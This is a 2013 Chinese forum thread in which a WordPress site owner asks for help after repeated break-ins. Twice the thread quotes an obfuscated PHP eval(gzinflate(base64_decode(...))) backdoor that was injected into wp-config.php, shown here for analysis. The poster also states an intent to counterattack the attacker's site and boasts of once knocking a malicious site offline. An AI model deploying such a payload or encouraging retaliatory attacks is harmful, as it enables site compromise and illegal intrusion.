WP是不是又有什么重大漏洞没修复？

solar · 发表于 2013-3-19 00:19:37

本帖最后由 solar 于 2013-3-19 00:51 编辑

一个小博客每隔1星期被黑一次。VPS都换了3家了，全部最新版本的。。。。

wp-config.php也被注入了：

<?php eval(gzinflate(base64_decode('hVVbb9s2FH52gf4HJhBKKVFlu2vaop7WBIm2FV3iQnG2h8ATFJm02UikSl**8b/veeQsq2gAfYQ0Tz3y/cxvJWFEUoSrqtsURLfa3UZkO/Pnw0EJz7v1Bn7JhrT+LQAdSakMDRwVgOvWJGYbOUuwAQ1VtYwo2qQFquQnF6lf00/z7I0mV2lF7P05OLy9yQNydjZe6o1m1DsGysIejkV1uLkWktl5WQvjskoIJ0Xz8uG7dIWpWrYLsCaMFCT7xtjUbJsyUxWKGmYhMZc1Wsw1cy0WhKjReWjOfqD/Pkz3h9VobEpIQOcgSfKuDG6ZNKKJp6KKcW0XGmoQUDG0YTA+St8Svx1eIiFRzGYX3tiTv4l9MB6dNk99WTWhmnGfZdTQ1RIalSp7pj2vewySf9O0uv9P2ezzzBimGyS7s9t+17DGjDPtc7vfbpUalkyGtIbIZdw3OcrpeDMm1v8qpIGXfEsh+X61jtvCJyBW4YPiWsFU9MhSiMa0WAvtisIyHaALet1tNnPz03BHuDwIbTta6HjXS9n09Or8+QCIDOdzvbnthcOnYBVRIdQV5PRqFoc+RQjcZ1XzBUPNe7ZLXfA9XhAHh6IERXzA/LSIqCyN9T8Rt6MDo6wOQfpRVkgSiwlfLoypn4/HI6PxtGr1++i8atfovHb0VAWw6UsonpVf/iP6fjL15bp+6jMDWtM9KWhO+RiPLu07sprjK5qxAsPCb0DMjn1gN9pYbCoOuzhDP1dOLCw0EaLTrK2X8S3M9gM/JG3NbWWW8PjVpZC3uIALEXsbLHv4yfo4Wy60HAtgg+7BHB7/2i/2OWeaID7oNTVWeP6W5bqJi+JE7ld4i9IOZ6g2wBFbY773SCAWjRfwS07+QOAQOeT7mmqNVtmVW6KlU+H/wi5UHfNkAIe2zwgL16QR/rzy4/Jw7RmOu+b9Cjl5g+vi9KZZrXSBrjhj9zcLCZE3cNlmpxPZ0l2cnYGFJsQB5r/Aa4Ls7jh8U/oXQBofFpFi+ieBpvHECyfQnrfNnR4fvnuzevRKNgB7hHyMRA81tt127ubt6VJt6fsdDr99DG5plnWmoprOrcz6pi+XfZT4LAJQphQQOK4e4rR15O8iPsUJ93/jAFkLJS6FdDJJl2oc7nwx+F4BK10jR3axg7ehnTY0WlQayGhWojcCXaMOu4ohYMDVuXIKl63Fr416fNJ1BF9wEmTPpvWG47A3/oH')));?>

复制代码

哪位大大分析下这是什么网站，老子攻击它去
上次查到了一个挂马的网站，直接举报+攻击到它打不开

一步一杀 · 发表于 2013-3-19 00:48:53

VPS上还有其他站吗

solar · 发表于 2013-3-19 00:47:01

一步一杀发表于 2013-3-19 00:36
找到被黑原因了吗？查查日志呢

只能去挖这个了。。。
根目录被注入生成了：
sess_9f90b1c8d2dc066344f19a1dc2e00628 文件
打开：
^[^S^S^D^X^]^D^[^X^R^D^[^Z^_V

一步一杀 · 发表于 2013-3-19 00:36:23

找到被黑原因了吗？查查日志呢

啪啪啪啪啪 · 发表于 2013-3-19 00:27:17

提示: 作者被禁止或删除内容自动屏蔽

史上第一 · 发表于 2013-3-19 00:30:38

请将部分插件也更新到最新版.

信仰 · 发表于 2013-3-19 00:41:47

呃这个几率好小连续被黑的吗排查什么问题没有修复过没有

solar · 发表于 2013-3-19 00:44:42

史上第一发表于 2013-3-19 00:30
请将部分插件也更新到最新版.

都更新了

aarwwefdds · 发表于 2013-3-19 00:45:48

确定人家没留后门在你的WP中？

solar · 发表于 2013-3-19 00:48:16

本帖最后由 solar 于 2013-3-19 00:50 编辑

wp-config.php也被注入了：

<?php eval(gzinflate(base64_decode('hVVbb9s2FH52gf4HJhBKKVFlu2vaop7WBIm2FV3iQnG2h8ATFJm02UikSl**8b/veeQsq2gAfYQ0Tz3y/cxvJWFEUoSrqtsURLfa3UZkO/Pnw0EJz7v1Bn7JhrT+LQAdSakMDRwVgOvWJGYbOUuwAQ1VtYwo2qQFquQnF6lf00/z7I0mV2lF7P05OLy9yQNydjZe6o1m1DsGysIejkV1uLkWktl5WQvjskoIJ0Xz8uG7dIWpWrYLsCaMFCT7xtjUbJsyUxWKGmYhMZc1Wsw1cy0WhKjReWjOfqD/Pkz3h9VobEpIQOcgSfKuDG6ZNKKJp6KKcW0XGmoQUDG0YTA+St8Svx1eIiFRzGYX3tiTv4l9MB6dNk99WTWhmnGfZdTQ1RIalSp7pj2vewySf9O0uv9P2ezzzBimGyS7s9t+17DGjDPtc7vfbpUalkyGtIbIZdw3OcrpeDMm1v8qpIGXfEsh+X61jtvCJyBW4YPiWsFU9MhSiMa0WAvtisIyHaALet1tNnPz03BHuDwIbTta6HjXS9n09Or8+QCIDOdzvbnthcOnYBVRIdQV5PRqFoc+RQjcZ1XzBUPNe7ZLXfA9XhAHh6IERXzA/LSIqCyN9T8Rt6MDo6wOQfpRVkgSiwlfLoypn4/HI6PxtGr1++i8atfovHb0VAWw6UsonpVf/iP6fjL15bp+6jMDWtM9KWhO+RiPLu07sprjK5qxAsPCb0DMjn1gN9pYbCoOuzhDP1dOLCw0EaLTrK2X8S3M9gM/JG3NbWWW8PjVpZC3uIALEXsbLHv4yfo4Wy60HAtgg+7BHB7/2i/2OWeaID7oNTVWeP6W5bqJi+JE7ld4i9IOZ6g2wBFbY773SCAWjRfwS07+QOAQOeT7mmqNVtmVW6KlU+H/wi5UHfNkAIe2zwgL16QR/rzy4/Jw7RmOu+b9Cjl5g+vi9KZZrXSBrjhj9zcLCZE3cNlmpxPZ0l2cnYGFJsQB5r/Aa4Ls7jh8U/oXQBofFpFi+ieBpvHECyfQnrfNnR4fvnuzevRKNgB7hHyMRA81tt127ubt6VJt6fsdDr99DG5plnWmoprOrcz6pi+XfZT4LAJQphQQOK4e4rR15O8iPsUJ93/jAFkLJS6FdDJJl2oc7nwx+F4BK10jR3axg7ehnTY0WlQayGhWojcCXaMOu4ohYMDVuXIKl63Fr416fNJ1BF9wEmTPpvWG47A3/oH')));?>

复制代码

哪位大大分析下这是什么网站，老子攻击它去
上次查到了一个挂马的网站，直接举报+攻击到它打不开

		自动登录	找回密码
密码			注册

啪啪啪啪啪啪啪啪啪啪当前离线积分 9795	发表于 2013-3-19 00:27:17 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
啪啪啪啪啪啪啪啪啪啪当前离线积分 9795
	回复支持反对举报